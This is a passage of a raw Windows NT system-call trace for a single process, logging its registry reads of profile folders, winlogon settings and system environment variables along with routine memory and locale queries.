 04096   712   NtRequestWaitReplyPort  (632, {32, 56, new_msg, 0, 44, 12, 20, 0}  (632, {32, 56, new_msg, 0, 44, 12, 20, 0} "\1\0\0\0A\2\0\0\351?\334\21\261\310\0\14)\371\246\3050\0\0\0\377\377\377\377@\2\0\0" ... {124, 148, reply, 0, 452, 712, 1578, 0} "\2@\375\177\1\00\300\0\0\0\0\257\2\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\304\253\202\371X\5O\200\0@\375\177\0\0\0\0\0\0\0\0\0\207\34\201 \320\34\201\1\320\34\201\0\0\0\0P\377\37\300 \320\34\201\0\0\0\0\0\0\306\0\377\377\305\0\0\0\0\0\0\0\306\0\0>\34\201 \320\34\201<\253\202\371" )  ... {124, 148, reply, 0, 452, 712, 1578, 0}  (632, {32, 56, new_msg, 0, 44, 12, 20, 0} "\1\0\0\0A\2\0\0\351?\334\21\261\310\0\14)\371\246\3050\0\0\0\377\377\377\377@\2\0\0" ... {124, 148, reply, 0, 452, 712, 1578, 0} "\2@\375\177\1\00\300\0\0\0\0\257\2\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\304\253\202\371X\5O\200\0@\375\177\0\0\0\0\0\0\0\0\0\207\34\201 \320\34\201\1\320\34\201\0\0\0\0P\377\37\300 \320\34\201\0\0\0\0\0\0\306\0\377\377\305\0\0\0\0\0\0\0\306\0\0>\34\201 \320\34\201<\253\202\371" )  ) == 0x0
 04097   712   NtWaitForSingleObject  (404, 0, 0x0, ... ) == 0x0
 04098   712   NtQueryInformationFile  (400, 24706200, 24, Standard, ... {status=0x0, info=24}, ) == 0x0
 04099   712   NtReleaseMutant  (404, ... 0x0, ) == 0x0
 04100   712   NtRequestWaitReplyPort  (392, {28, 52, new_msg, 0, 0, 0, 0, 0}  (392, {28, 52, new_msg, 0, 0, 0, 0, 0} "\37\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\2\0\1\0\13\30\0\2\370X\27\0" ... {176, 200, reply, 0, 452, 712, 1579, 0} "\37\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\2\0\1\0\20\0\0\2\220\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0S\0R\0I\0-\0u\0s\0e\0r\0" )  ... {176, 200, reply, 0, 452, 712, 1579, 0}  (392, {28, 52, new_msg, 0, 0, 0, 0, 0} "\37\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\2\0\1\0\13\30\0\2\370X\27\0" ... {176, 200, reply, 0, 452, 712, 1579, 0} "\37\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\2\0\1\0\20\0\0\2\220\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0S\0R\0I\0-\0u\0s\0e\0r\0" )  ) == 0x0
 04101   712   NtOpenKey  (0x1, {24, 48, 0x40, 0, 0,  (0x1, {24, 48, 0x40, 0, 0, "SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 04102   712   NtOpenThreadToken  (-2, 0x20008, 1, ... ) == STATUS_NO_TOKEN
 04103   712   NtOpenProcessToken  (-1, 0x20008, ... 636, ) == 0x0
 04104   712   NtQueryInformationToken  (636, User, 80, ... {token info, class 1, size 36}, 36, ) == 0x0
 04105   712   NtClose  (636, ... ) == 0x0
 04106   712   NtOpenKey  (0x3, {24, 124, 0x40, 0, 0,  (0x3, {24, 124, 0x40, 0, 0, "S-1-5-21-1078081533-484763869-839522115-1003"}, ... 636, ) }, ... 636, ) == 0x0
 04107   712   NtOpenKey  (0x1, {24, 636, 0x40, 0, 0,  (0x1, {24, 636, 0x40, 0, 0, "Software\Microsoft\windows\CurrentVersion\Internet Settings"}, ... 640, ) }, ... 640, ) == 0x0
 04108   712   NtQueryValueKey  (640,  (640, "MigrateProxy", Partial, 144, ... TitleIdx=0, Type=4, Data="\1\0\0\0"}, 16, ) , Partial, 144, ... TitleIdx=0, Type=4, Data= (640, "MigrateProxy", Partial, 144, ... TitleIdx=0, Type=4, Data="\1\0\0\0"}, 16, ) }, 16, ) == 0x0
 04109   712   NtClose  (640, ... ) == 0x0
 04110   712   NtAllocateVirtualMemory  (-1, 1531904, 0, 20480, 4096, 4, ... 1531904, 20480, ) == 0x0
 04111   712   NtOpenThreadToken  (-2, 0xc, 1, ... ) == STATUS_NO_TOKEN
 04112   712   NtOpenProcessToken  (-1, 0xc, ... 640, ) == 0x0
 04113   712   NtReleaseSemaphore  (416, 1, ... 0, ) == 0x0
 04114   712   NtWaitForSingleObject  (416, 0, {0, 0}, ... ) == 0x0
 04115   712   NtCreateKey  (0x2000000, {24, 48, 0x40, 0, 0,  (0x2000000, {24, 48, 0x40, 0, 0, "Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders"}, 0, 0x0, 0, ... 644, 2, ) }, 0, 0x0, 0, ... 644, 2, ) == 0x0
 04116   712   NtQueryValueKey  (644,  (644, "Common AppData", Partial, 144, ... TitleIdx=0, Type=2, Data="%\0A\0L\0L\0U\0S\0E\0R\0S\0P\0R\0O\0F\0I\0L\0E\0%\0\\0A\0p\0p\0l\0i\0c\0a\0t\0i\0o\0n\0 \0D\0a\0t\0a\0\0\0"}, 82, ) , Partial, 144, ... TitleIdx=0, Type=2, Data= (644, "Common AppData", Partial, 144, ... TitleIdx=0, Type=2, Data="%\0A\0L\0L\0U\0S\0E\0R\0S\0P\0R\0O\0F\0I\0L\0E\0%\0\\0A\0p\0p\0l\0i\0c\0a\0t\0i\0o\0n\0 \0D\0a\0t\0a\0\0\0"}, 82, ) }, 82, ) == 0x0
 04117   712   NtOpenSection  (0xe, {24, 8, 0x40, 0, 0,  (0xe, {24, 8, 0x40, 0, 0, "USERENV.dll"}, ... 648, ) }, ... 648, ) == 0x0
 04118   712   NtMapViewOfSection  (648, -1, (0x0), 0, 0, 0x0, 0, 1, 0, 4, ... (0x75a70000), 0x0, 667648, ) == 0x0
 04119   712   NtClose  (648, ... ) == 0x0
 04120   712   NtOpenKey  (0x2000000, {24, 48, 0x40, 0, 0,  (0x2000000, {24, 48, 0x40, 0, 0, "Software\Microsoft\Windows NT\CurrentVersion\winlogon"}, ... 648, ) }, ... 648, ) == 0x0
 04121   712   NtQueryValueKey  (648,  (648, "UserEnvDebugLevel", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 04122   712   NtClose  (648, ... ) == 0x0
 04123   712   NtOpenKey  (0x2000000, {24, 48, 0x40, 0, 0,  (0x2000000, {24, 48, 0x40, 0, 0, "Software\Microsoft\Windows NT\CurrentVersion\winlogon"}, ... 648, ) }, ... 648, ) == 0x0
 04124   712   NtQueryValueKey  (648,  (648, "ChkAccDebugLevel", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 04125   712   NtClose  (648, ... ) == 0x0
 04126   712   NtOpenKey  (0x20019, {24, 48, 0x40, 0, 0,  (0x20019, {24, 48, 0x40, 0, 0, "System\CurrentControlSet\Control\ProductOptions"}, ... 648, ) }, ... 648, ) == 0x0
 04127   712   NtQueryValueKey  (648,  (648, "ProductType", Partial, 144, ... TitleIdx=0, Type=1, Data="W\0i\0n\0N\0T\0\0\0"}, 24, ) , Partial, 144, ... TitleIdx=0, Type=1, Data= (648, "ProductType", Partial, 144, ... TitleIdx=0, Type=1, Data="W\0i\0n\0N\0T\0\0\0"}, 24, ) }, 24, ) == 0x0
 04128   712   NtClose  (648, ... ) == 0x0
 04129   712   NtCreateEvent  (0x1f0003, {24, 64, 0x80, 24701412, 0,  (0x1f0003, {24, 64, 0x80, 24701412, 0, "Global\userenv:  User Profile setup event"}, 0, 1, ... 648, ) }, 0, 1, ... 648, ) == STATUS_OBJECT_NAME_EXISTS
 04130   712   NtQueryDefaultLocale  (1, 24699248, ... ) == 0x0
 04131   712   NtQueryDefaultLocale  (1, 24699248, ... ) == 0x0
 04132   712   NtQueryDefaultLocale  (1, 24699248, ... ) == 0x0
 04133   712   NtQueryDefaultLocale  (1, 24699248, ... ) == 0x0
 04134   712   NtQueryDefaultLocale  (1, 24699248, ... ) == 0x0
 04135   712   NtQueryDefaultLocale  (1, 24699248, ... ) == 0x0
 04136   712   NtQueryDefaultLocale  (1, 24699248, ... ) == 0x0
 04137   712   NtQueryDefaultLocale  (1, 24699248, ... ) == 0x0
 04138   712   NtQueryDefaultLocale  (1, 24699248, ... ) == 0x0
 04139   712   NtQueryDefaultLocale  (1, 24699248, ... ) == 0x0
 04140   712   NtQueryDefaultLocale  (1, 24699248, ... ) == 0x0
 04141   712   NtQueryDefaultLocale  (1, 24699248, ... ) == 0x0
 04142   712   NtQueryDefaultLocale  (1, 24699248, ... ) == 0x0
 04143   712   NtQueryDefaultLocale  (1, 24699248, ... ) == 0x0
 04144   712   NtQueryDefaultLocale  (1, 24699248, ... ) == 0x0
 04145   712   NtQueryDefaultLocale  (1, 24699248, ... ) == 0x0
 04146   712   NtQueryDefaultLocale  (1, 24699248, ... ) == 0x0
 04147   712   NtQueryDefaultLocale  (1, 24699248, ... ) == 0x0
 04148   712   NtQueryDefaultLocale  (1, 24699248, ... ) == 0x0
 04149   712   NtQueryDefaultLocale  (1, 24699248, ... ) == 0x0
 04150   712   NtQueryDefaultLocale  (1, 24699248, ... ) == 0x0
 04151   712   NtQueryDefaultLocale  (1, 24699248, ... ) == 0x0
 04152   712   NtQueryDefaultLocale  (1, 24699248, ... ) == 0x0
 04153   712   NtQueryDefaultLocale  (1, 24699248, ... ) == 0x0
 04154   712   NtQueryDefaultLocale  (1, 24699248, ... ) == 0x0
 04155   712   NtQueryDefaultLocale  (1, 24699248, ... ) == 0x0
 04156   712   NtOpenThreadTokenEx  (-2, 0x20008, 1, 512, ... ) == STATUS_NO_TOKEN
 04157   712   NtOpenProcessTokenEx  (-1, 0x20008, 512, ... 652, ) == 0x0
 04158   712   NtQueryInformationToken  (652, User, 80, ... {token info, class 1, size 36}, 36, ) == 0x0
 04159   712   NtClose  (652, ... ) == 0x0
 04160   712   NtOpenKey  (0x20019, {24, 0, 0x640, 0, 0,  (0x20019, {24, 0, 0x640, 0, 0, "\REGISTRY\USER\S-1-5-21-1078081533-484763869-839522115-1003"}, ... 652, ) }, ... 652, ) == 0x0
 04161   712   NtOpenKey  (0x20019, {24, 652, 0x40, 0, 0,  (0x20019, {24, 652, 0x40, 0, 0, "Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders"}, ... 656, ) }, ... 656, ) == 0x0
 04162   712   NtQueryValueKey  (656,  (656, "Personal", Partial, 144, ... TitleIdx=0, Type=2, Data="%\0U\0S\0E\0R\0P\0R\0O\0F\0I\0L\0E\0%\0\\0M\0y\0 \0D\0o\0c\0u\0m\0e\0n\0t\0s\0\0\0"}, 66, ) , Partial, 144, ... TitleIdx=0, Type=2, Data= (656, "Personal", Partial, 144, ... TitleIdx=0, Type=2, Data="%\0U\0S\0E\0R\0P\0R\0O\0F\0I\0L\0E\0%\0\\0M\0y\0 \0D\0o\0c\0u\0m\0e\0n\0t\0s\0\0\0"}, 66, ) }, 66, ) == 0x0
 04163   712   NtQueryDefaultLocale  (1, 24699248, ... ) == 0x0
 04164   712   NtQueryValueKey  (656,  (656, "Local Settings", Partial, 144, ... TitleIdx=0, Type=2, Data="%\0U\0S\0E\0R\0P\0R\0O\0F\0I\0L\0E\0%\0\\0L\0o\0c\0a\0l\0 \0S\0e\0t\0t\0i\0n\0g\0s\0\0\0"}, 70, ) , Partial, 144, ... TitleIdx=0, Type=2, Data= (656, "Local Settings", Partial, 144, ... TitleIdx=0, Type=2, Data="%\0U\0S\0E\0R\0P\0R\0O\0F\0I\0L\0E\0%\0\\0L\0o\0c\0a\0l\0 \0S\0e\0t\0t\0i\0n\0g\0s\0\0\0"}, 70, ) }, 70, ) == 0x0
 04165   712   NtQueryDefaultLocale  (1, 24699248, ... ) == 0x0
 04166   712   NtQueryDefaultLocale  (1, 24699248, ... ) == 0x0
 04167   712   NtQueryDefaultLocale  (1, 24699248, ... ) == 0x0
 04168   712   NtQueryDefaultLocale  (1, 24699248, ... ) == 0x0
 04169   712   NtClose  (656, ... ) == 0x0
 04170   712   NtClose  (652, ... ) == 0x0
 04171   712   NtOpenKey  (0x2000000, {24, 48, 0x40, 0, 0,  (0x2000000, {24, 48, 0x40, 0, 0, "Software\Microsoft\Windows NT\CurrentVersion\winlogon"}, ... 652, ) }, ... 652, ) == 0x0
 04172   712   NtQueryValueKey  (652,  (652, "RsopDebugLevel", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 04173   712   NtClose  (652, ... ) == 0x0
 04174   712   NtOpenKey  (0x2000000, {24, 48, 0x40, 0, 0,  (0x2000000, {24, 48, 0x40, 0, 0, "Software\Microsoft\Windows NT\CurrentVersion\winlogon"}, ... 652, ) }, ... 652, ) == 0x0
 04175   712   NtQueryValueKey  (652,  (652, "UserEnvDebugLevel", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 04176   712   NtQueryValueKey  (652,  (652, "RsopLogging", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 04177   712   NtClose  (652, ... ) == 0x0
 04178   712   NtOpenKey  (0x2000000, {24, 48, 0x40, 0, 0,  (0x2000000, {24, 48, 0x40, 0, 0, "Software\Policies\Microsoft\Windows\System"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 04179   712   NtOpenKey  (0x2000000, {24, 48, 0x40, 0, 0,  (0x2000000, {24, 48, 0x40, 0, 0, "Software\Microsoft\Windows NT\CurrentVersion\winlogon"}, ... 652, ) }, ... 652, ) == 0x0
 04180   712   NtQueryValueKey  (652,  (652, "UserEnvDebugLevel", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 04181   712   NtClose  (652, ... ) == 0x0
 04182   712   NtOpenKey  (0x2000000, {24, 48, 0x40, 0, 0,  (0x2000000, {24, 48, 0x40, 0, 0, "Software\Policies\Microsoft\Windows\System"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 04183   712   NtAllocateVirtualMemory  (-1, 0, 0, 1, 4096, 4, ... 24772608, 4096, ) == 0x0
 04184   712   NtAllocateVirtualMemory  (-1, 1552384, 0, 4096, 4096, 4, ... 1552384, 4096, ) == 0x0
 04185   712   NtQueryVirtualMemory  (-1, 0x17a0000, Basic, 28, ... {BaseAddress=0x17a0000,AllocationBase=0x17a0000,AllocationProtect=0x4,RegionSize=0x1000,State=0x1000,Protect=0x4,Type=0x20000,}, 0x0, ) == 0x0
 04186   712   NtQueryVirtualMemory  (-1, 0x17a0000, Basic, 28, ... {BaseAddress=0x17a0000,AllocationBase=0x17a0000,AllocationProtect=0x4,RegionSize=0x1000,State=0x1000,Protect=0x4,Type=0x20000,}, 0x0, ) == 0x0
 04187   712   NtOpenKey  (0x20019, {24, 48, 0x40, 0, 0,  (0x20019, {24, 48, 0x40, 0, 0, "Software\Microsoft\Windows NT\CurrentVersion\ProfileList"}, ... 652, ) }, ... 652, ) == 0x0
 04188   712   NtQueryValueKey  (652,  (652, "ProfilesDirectory", Partial, 144, ... TitleIdx=0, Type=2, Data="%\0S\0y\0s\0t\0e\0m\0D\0r\0i\0v\0e\0%\0\\0D\0o\0c\0u\0m\0e\0n\0t\0s\0 \0a\0n\0d\0 \0S\0e\0t\0t\0i\0n\0g\0s\0\0\0"}, 86, ) , Partial, 144, ... TitleIdx=0, Type=2, Data= (652, "ProfilesDirectory", Partial, 144, ... TitleIdx=0, Type=2, Data="%\0S\0y\0s\0t\0e\0m\0D\0r\0i\0v\0e\0%\0\\0D\0o\0c\0u\0m\0e\0n\0t\0s\0 \0a\0n\0d\0 \0S\0e\0t\0t\0i\0n\0g\0s\0\0\0"}, 86, ) }, 86, ) == 0x0
 04189   712   NtClose  (652, ... ) == 0x0
 04190   712   NtOpenKey  (0x20019, {24, 48, 0x40, 0, 0,  (0x20019, {24, 48, 0x40, 0, 0, "Software\Microsoft\Windows NT\CurrentVersion\ProfileList"}, ... 652, ) }, ... 652, ) == 0x0
 04191   712   NtQueryValueKey  (652,  (652, "AllUsersProfile", Partial, 144, ... TitleIdx=0, Type=1, Data="A\0l\0l\0 \0U\0s\0e\0r\0s\0\0\0"}, 32, ) , Partial, 144, ... TitleIdx=0, Type=1, Data= (652, "AllUsersProfile", Partial, 144, ... TitleIdx=0, Type=1, Data="A\0l\0l\0 \0U\0s\0e\0r\0s\0\0\0"}, 32, ) }, 32, ) == 0x0
 04192   712   NtClose  (652, ... ) == 0x0
 04193   712   NtQueryVirtualMemory  (-1, 0x17a0000, Basic, 28, ... {BaseAddress=0x17a0000,AllocationBase=0x17a0000,AllocationProtect=0x4,RegionSize=0x1000,State=0x1000,Protect=0x4,Type=0x20000,}, 0x0, ) == 0x0
 04194   712   NtOpenKey  (0x1, {24, 48, 0x40, 0, 0,  (0x1, {24, 48, 0x40, 0, 0, "System\CurrentControlSet\Control\Session Manager\Environment"}, ... 652, ) }, ... 652, ) == 0x0
 04195   712   NtQueryKey  (652, Full, 176, ... {LastWrite={0x7838d13c,0x1c73999}, TitleIdx=0, Subkeys=0, Values=12, Class=""}, 44, ) == 0x0
 04196   712   NtQuerySecurityObject  (652, 7, 0, ... ) == STATUS_ACCESS_DENIED
 04197   712   NtEnumerateValueKey  (652, 0, Full, 220, ... TitleIdx=0, Type=2, Name= (652, 0, Full, 220, ... TitleIdx=0, Type=2, Name="ComSpec", Data="%\0S\0y\0s\0t\0e\0m\0R\0o\0o\0t\0%\0\\0s\0y\0s\0t\0e\0m\03\02\0\\0c\0m\0d\0.\0e\0x\0e\0\0\0"}, 96, ) , Data= (652, 0, Full, 220, ... TitleIdx=0, Type=2, Name="ComSpec", Data="%\0S\0y\0s\0t\0e\0m\0R\0o\0o\0t\0%\0\\0s\0y\0s\0t\0e\0m\03\02\0\\0c\0m\0d\0.\0e\0x\0e\0\0\0"}, 96, ) }, 96, ) == 0x0
 04198   712   NtEnumerateValueKey  (652, 1, Full, 220, ... TitleIdx=0, Type=2, Name= (652, 1, Full, 220, ... TitleIdx=0, Type=2, Name="Path", Data="%\0S\0y\0s\0t\0e\0m\0R\0o\0o\0t\0%\0\\0s\0y\0s\0t\0e\0m\03\02\0;\0%\0S\0y\0s\0t\0e\0m\0R\0o\0o\0t\0%\0;\0%\0S\0y\0s\0t\0e\0m\0R\0o\0o\0t\0%\0\\0S\0y\0s\0t\0e\0m\03\02\0\\0W\0b\0e\0m\0\0\0"}, 152, ) , Data= (652, 1, Full, 220, ... TitleIdx=0, Type=2, Name="Path", Data="%\0S\0y\0s\0t\0e\0m\0R\0o\0o\0t\0%\0\\0s\0y\0s\0t\0e\0m\03\02\0;\0%\0S\0y\0s\0t\0e\0m\0R\0o\0o\0t\0%\0;\0%\0S\0y\0s\0t\0e\0m\0R\0o\0o\0t\0%\0\\0S\0y\0s\0t\0e\0m\03\02\0\\0W\0b\0e\0m\0\0\0"}, 152, ) }, 152, ) == 0x0
 04199   712   NtEnumerateValueKey  (652, 2, Full, 220, ... TitleIdx=0, Type=2, Name= (652, 2, Full, 220, ... TitleIdx=0, Type=2, Name="windir", Data="%\0S\0y\0s\0t\0e\0m\0R\0o\0o\0t\0%\0\0\0"}, 58, ) , Data= (652, 2, Full, 220, ... TitleIdx=0, Type=2, Name="windir", Data="%\0S\0y\0s\0t\0e\0m\0R\0o\0o\0t\0%\0\0\0"}, 58, ) }, 58, ) == 0x0
 04200   712   NtEnumerateValueKey  (652, 3, Full, 220, ... TitleIdx=0, Type=1, Name= (652, 3, Full, 220, ... TitleIdx=0, Type=1, Name="OS", Data="W\0i\0n\0d\0o\0w\0s\0_\0N\0T\0\0\0"}, 46, ) , Data= (652, 3, Full, 220, ... TitleIdx=0, Type=1, Name="OS", Data="W\0i\0n\0d\0o\0w\0s\0_\0N\0T\0\0\0"}, 46, ) }, 46, ) == 0x0
 04201   712   NtQueryVirtualMemory  (-1, 0x17a0000, Basic, 28, ... {BaseAddress=0x17a0000,AllocationBase=0x17a0000,AllocationProtect=0x4,RegionSize=0x1000,State=0x1000,Protect=0x4,Type=0x20000,}, 0x0, ) == 0x0
 04202   712   NtEnumerateValueKey  (652, 4, Full, 220, ... TitleIdx=0, Type=1, Name= (652, 4, Full, 220, ... TitleIdx=0, Type=1, Name="PROCESSOR_ARCHITECTURE", Data="x\08\06\0\0\0"}, 72, ) , Data= (652, 4, Full, 220, ... TitleIdx=0, Type=1, Name="PROCESSOR_ARCHITECTURE", Data="x\08\06\0\0\0"}, 72, ) }, 72, ) == 0x0
 04203   712   NtQueryVirtualMemory  (-1, 0x17a0000, Basic, 28, ... {BaseAddress=0x17a0000,AllocationBase=0x17a0000,AllocationProtect=0x4,RegionSize=0x1000,State=0x1000,Protect=0x4,Type=0x20000,}, 0x0, ) == 0x0
 04204   712   NtEnumerateValueKey  (652, 5, Full, 220, ... TitleIdx=0, Type=1, Name= (652, 5, Full, 220, ... TitleIdx=0, Type=1, Name="PROCESSOR_LEVEL", Data="1\05\0\0\0"}, 58, ) , Data= (652, 5, Full, 220, ... TitleIdx=0, Type=1, Name="PROCESSOR_LEVEL", Data="1\05\0\0\0"}, 58, ) }, 58, ) == 0x0
 04205   712   NtQueryVirtualMemory  (-1, 0x17a0000, Basic, 28, ... {BaseAddress=0x17a0000,AllocationBase=0x17a0000,AllocationProtect=0x4,RegionSize=0x1000,State=0x1000,Protect=0x4,Type=0x20000,}, 0x0, ) == 0x0
 04206   712   NtEnumerateValueKey  (652, 6, Full, 220, ... TitleIdx=0, Type=1, Name= (652, 6, Full, 220, ... TitleIdx=0, Type=1, Name="PROCESSOR_IDENTIFIER", Data="x\08\06\0 \0F\0a\0m\0i\0l\0y\0 \01\05\0 \0M\0o\0d\0e\0l\0 \04\0 \0S\0t\0e\0p\0p\0i\0n\0g\0 \08\0,\0 \0G\0e\0n\0u\0i\0n\0e\0I\0n\0t\0e\0l\0\0\0"}, 154, ) , Data= (652, 6, Full, 220, ... TitleIdx=0, Type=1, Name="PROCESSOR_IDENTIFIER", Data="x\08\06\0 \0F\0a\0m\0i\0l\0y\0 \01\05\0 \0M\0o\0d\0e\0l\0 \04\0 \0S\0t\0e\0p\0p\0i\0n\0g\0 \08\0,\0 \0G\0e\0n\0u\0i\0n\0e\0I\0n\0t\0e\0l\0\0\0"}, 154, ) }, 154, ) == 0x0
 04207   712   NtQueryVirtualMemory  (-1, 0x17a0000, Basic, 28, ... {BaseAddress=0x17a0000,AllocationBase=0x17a0000,AllocationProtect=0x4,RegionSize=0x1000,State=0x1000,Protect=0x4,Type=0x20000,}, 0x0, ) == 0x0
 04208   712   NtEnumerateValueKey  (652, 7, Full, 220, ... TitleIdx=0, Type=1, Name= (652, 7, Full, 220, ... TitleIdx=0, Type=1, Name="PROCESSOR_REVISION", Data="0\04\00\08\0\0\0"}, 66, ) , Data= (652, 7, Full, 220, ... TitleIdx=0, Type=1, Name="PROCESSOR_REVISION", Data="0\04\00\08\0\0\0"}, 66, ) }, 66, ) == 0x0
 04209   712   NtQueryVirtualMemory  (-1, 0x17a0000, Basic, 28, ... {BaseAddress=0x17a0000,AllocationBase=0x17a0000,AllocationProtect=0x4,RegionSize=0x1000,State=0x1000,Protect=0x4,Type=0x20000,}, 0x0, ) == 0x0
 04210   712   NtEnumerateValueKey  (652, 8, Full, 220, ... TitleIdx=0, Type=1, Name= (652, 8, Full, 220, ... TitleIdx=0, Type=1, Name="NUMBER_OF_PROCESSORS", Data="1\0\0\0"}, 64, ) , Data= (652, 8, Full, 220, ... TitleIdx=0, Type=1, Name="NUMBER_OF_PROCESSORS", Data="1\0\0\0"}, 64, ) }, 64, ) == 0x0
 04211   712   NtQueryVirtualMemory  (-1, 0x17a0000, Basic, 28, ... {BaseAddress=0x17a0000,AllocationBase=0x17a0000,AllocationProtect=0x4,RegionSize=0x1000,State=0x1000,Protect=0x4,Type=0x20000,}, 0x0, ) == 0x0
 04212   712   NtEnumerateValueKey  (652, 9, Full, 220, ... TitleIdx=0, Type=1, Name= (652, 9, Full, 220, ... TitleIdx=0, Type=1, Name="PATHEXT", Data=".\0C\0O\0M\0;\0.\0E\0X\0E\0;\0.\0B\0A\0T\0;\0.\0C\0M\0D\0;\0.\0V\0B\0S\0;\0.\0V\0B\0E\0;\0.\0J\0S\0;\0.\0J\0S\0E\0;\0.\0W\0S\0F\0;\0.\0W\0S\0H\0\0\0"}, 134, ) , Data= (652, 9, Full, 220, ... TitleIdx=0, Type=1, Name="PATHEXT", Data=".\0C\0O\0M\0;\0.\0E\0X\0E\0;\0.\0B\0A\0T\0;\0.\0C\0M\0D\0;\0.\0V\0B\0S\0;\0.\0V\0B\0E\0;\0.\0J\0S\0;\0.\0J\0S\0E\0;\0.\0W\0S\0F\0;\0.\0W\0S\0H\0\0\0"}, 134, ) }, 134, ) == 0x0
 04213   712   NtQueryVirtualMemory  (-1, 0x17a0000, Basic, 28, ... {BaseAddress=0x17a0000,AllocationBase=0x17a0000,AllocationProtect=0x4,RegionSize=0x1000,State=0x1000,Protect=0x4,Type=0x20000,}, 0x0, ) == 0x0
 04214   712   NtEnumerateValueKey  (652, 10, Full, 220, ... TitleIdx=0, Type=2, Name= (652, 10, Full, 220, ... TitleIdx=0, Type=2, Name="TEMP", Data="%\0S\0y\0s\0t\0e\0m\0R\0o\0o\0t\0%\0\\0T\0E\0M\0P\0\0\0"}, 64, ) , Data= (652, 10, Full, 220, ... TitleIdx=0, Type=2, Name="TEMP", Data="%\0S\0y\0s\0t\0e\0m\0R\0o\0o\0t\0%\0\\0T\0E\0M\0P\0\0\0"}, 64, ) }, 64, ) == 0x0
 04215   712   NtEnumerateValueKey  (652, 11, Full, 220, ... TitleIdx=0, Type=2, Name= (652, 11, Full, 220, ... TitleIdx=0, Type=2, Name="TMP", Data="%\0S\0y\0s\0t\0e\0m\0R\0o\0o\0t\0%\0\\0T\0E\0M\0P\0\0\0"}, 64, ) , Data= (652, 11, Full, 220, ... TitleIdx=0, Type=2, Name="TMP", Data="%\0S\0y\0s\0t\0e\0m\0R\0o\0o\0t\0%\0\\0T\0E\0M\0P\0\0\0"}, 64, ) }, 64, ) == 0x0
 04216   712   NtEnumerateValueKey  (652, 0, Full, 220, ... TitleIdx=0, Type=2, Name= (652, 0, Full, 220, ... TitleIdx=0, Type=2, Name="ComSpec", Data="%\0S\0y\0s\0t\0e\0m\0R\0o\0o\0t\0%\0\\0s\0y\0s\0t\0e\0m\03\02\0\\0c\0m\0d\0.\0e\0x\0e\0\0\0"}, 96, ) , Data= (652, 0, Full, 220, ... TitleIdx=0, Type=2, Name="ComSpec", Data="%\0S\0y\0s\0t\0e\0m\0R\0o\0o\0t\0%\0\\0s\0y\0s\0t\0e\0m\03\02\0\\0c\0m\0d\0.\0e\0x\0e\0\0\0"}, 96, ) }, 96, ) == 0x0
 04217   712   NtQueryVirtualMemory  (-1, 0x17a0000, Basic, 28, ... {BaseAddress=0x17a0000,AllocationBase=0x17a0000,AllocationProtect=0x4,RegionSize=0x1000,State=0x1000,Protect=0x4,Type=0x20000,}, 0x0, ) == 0x0
 04218   712   NtEnumerateValueKey  (652, 1, Full, 220, ... TitleIdx=0, Type=2, Name= (652, 1, Full, 220, ... TitleIdx=0, Type=2, Name="Path", Data="%\0S\0y\0s\0t\0e\0m\0R\0o\0o\0t\0%\0\\0s\0y\0s\0t\0e\0m\03\02\0;\0%\0S\0y\0s\0t\0e\0m\0R\0o\0o\0t\0%\0;\0%\0S\0y\0s\0t\0e\0m\0R\0o\0o\0t\0%\0\\0S\0y\0s\0t\0e\0m\03\02\0\\0W\0b\0e\0m\0\0\0"}, 152, ) , Data= (652, 1, Full, 220, ... TitleIdx=0, Type=2, Name="Path", Data="%\0S\0y\0s\0t\0e\0m\0R\0o\0o\0t\0%\0\\0s\0y\0s\0t\0e\0m\03\02\0;\0%\0S\0y\0s\0t\0e\0m\0R\0o\0o\0t\0%\0;\0%\0S\0y\0s\0t\0e\0m\0R\0o\0o\0t\0%\0\\0S\0y\0s\0t\0e\0m\03\02\0\\0W\0b\0e\0m\0\0\0"}, 152, ) }, 152, ) == 0x0
 04219   712   NtQueryVirtualMemory  (-1, 0x17a0000, Basic, 28, ... {BaseAddress=0x17a0000,AllocationBase=0x17a0000,AllocationProtect=0x4,RegionSize=0x1000,State=0x1000,Protect=0x4,Type=0x20000,}, 0x0, ) == 0x0
